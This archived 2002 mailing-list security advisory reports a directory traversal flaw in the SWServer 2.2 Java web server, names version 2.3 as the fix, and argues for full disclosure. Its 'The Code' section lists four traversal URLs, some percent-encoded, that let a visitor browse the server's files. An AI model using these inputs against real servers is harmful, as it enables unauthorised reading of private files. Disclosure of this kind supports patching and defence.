SWServer 2.2 directory traversal bug

From: Bugtest (aluigiat_private)
Date: Wed Aug 28 2002 - 12:46:58 PDT

Next message: Aviram Jenik: "Webmin Vulnerability Leads to Remote Compromise (RPC CGI)"

Previous message: Drew: "RE: White paper: Exploiting the Win32 API."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

######################################################################

Auriemma Luigi, PivX security advisory 

Application: SWServer 
             (http://www.geocities.com/tlhome2000/swserver.html)
Version:     2.2 and previous
Bug:         Directory traversal bug
Risk (high): An attacker can view and "surf" in the directories of the
             remote server and view all the files in it.
Author:      Auriemma Luigi, Security Researcher, PivX Solutions, LLC
             e-mail: aluigiat_private

######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix
5) Philosophy

______________________________________________________________________

1) Introduction

Swserver is a small free webserver totally written in Java.
It can be considered just like a tiny webserver for tests or for be
used by single users that don't want to lost their time in
configuration files.

______________________________________________________________________

2) Bug

The bug is a directory traversal bug that let the attacker to use the
remote server like a new read-only drive, all readable with a browser.

The bad characters that can be used for exploit the vulnerability are
'\' (%5c) and '/' (%2f).

______________________________________________________________________

3) The Code

I suggest to try only these links and then follow the directories with
the browser:

http://host/%2f%2e%2e%2f
http://host/%5c%2e%2e%5c
http://host/..\
http://host/../

______________________________________________________________________

4) Fix

SWserver 2.3 from its homepage:

http://www.geocities.com/tlhome2000/swserver.html

______________________________________________________________________

5) Philosophy

I'm really hopeful about the FULL-DISCLOSURE policy, because with it
"everyone" can know the real effects of an attack, the real danger of
a bug, someone can learn a bit of creative programming (I have learned
a bit of interesting C from the source code of some published
exploits under this policy) and it's useful for all the people that 
are hopeful in this type of disclosure.
No secrets!

______________________________________________________________________

About PivX Solutions
PivX Solutions, is a premier network security consultancy offering a
myriad of network security services to our clients, the most notable
being our proprietary Risk and Vulnerability Assessment (RAVA).
Dedicated PivX founders have also developed the patented Invisiwall
network security device which offers the most comprehensive and secure
intrusion detection system available.

For more information go to http://www.PivX.com


Any type of feedback is really welcome!

Byez



-- 
PivX Security Researcher

Next message: Aviram Jenik: "Webmin Vulnerability Leads to Remote Compromise (RPC CGI)"
Previous message: Drew: "RE: White paper: Exploiting the Win32 API."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Aug 28 2002 - 11:12:33 PDT